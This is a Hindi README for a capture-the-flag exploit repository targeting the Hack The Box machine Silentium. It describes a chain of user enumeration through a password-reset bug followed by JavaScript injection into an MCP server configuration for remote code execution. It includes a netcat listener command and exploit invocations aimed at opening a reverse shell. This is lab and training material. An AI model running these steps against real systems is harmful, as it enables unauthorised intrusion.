
शोषण Silentium HTB-CTF
यह रिपॉजिटरी Hack The Box की Silentium मशीन के लिए संपूर्ण शोषण श्रृंखला (exploitation chain) प्रदान करती है। यह एक्सप्लॉइट उपयोगकर्ता गणना (user enumeration) और JavaScript इंजेक्शन से जुड़ी दो-चरणीय भेद्यता का लाभ उठाकर रिमोट कोड एक्ज़ीक्यूशन (RCE) प्राप्त करता है।
भेद्यता श्रृंखला में एक सूचना प्रकटीकरण दोष (information disclosure flaw) और एक गंभीर कोड इंजेक्शन शामिल है। पहले पासवर्ड रीसेट बग के माध्यम से वैध उपयोगकर्ताओं की गणना करके, हम customMCP एंडपॉइंट को लक्षित करने के लिए आवश्यक संदर्भ प्राप्त करते हैं। RCE को mcpServerConfig पैरामीटर में एक दुर्भावनापूर्ण JavaScript फ़ंक्शन इंजेक्ट करके प्राप्त किया जाता है, जिसे Node.js बैकएंड द्वारा निष्पादित किया जाता है।
आपके पास Python 3 और Bash स्थापित होना चाहिए, साथ ही निम्नलिखित लाइब्रेरी भी होनी चाहिए:
pip install requests
गणना स्क्रिप्ट (Bash) चलाएँ वैध खाते खोजने के लिए (users.txt आवश्यक है):
python3 CVE-2025-58434.py
अपनी स्थानीय मशीन पर, Netcat लिसनर शुरू करें:
nc -lvnp 4444
लक्ष्य, अपना IP, और प्राप्त API कुंजी प्रदान करते हुए Python स्क्रिप्ट चलाएँ:
python3 CVE-2025-59528.py -t -k <API_KEY> -l <YOUR_IP> -p 4444
| Argument | Description | Required |
|---|---|---|
| -t, --target | लक्ष्य होस्ट | हाँ |
| -k, --key | API बियरर टोकन | हाँ |
| -l, --lhost | आपका लिसनर IP (VPN) | हाँ |
| -p, --lport | आपका लिसनर पोर्ट | हाँ |
यह स्क्रिप्ट केवल शैक्षिक उद्देश्यों और CTF वातावरणों में अधिकृत पेनिट्रेशन टेस्टिंग के लिए है। बिना पूर्व अनुमति के लक्ष्यों तक पहुँचना या उन पर हमला करना अवैध है।
चुनौती: Silentium (Hack The Box)
CVEs: CVE-2025-58434 | CVE-2025-59528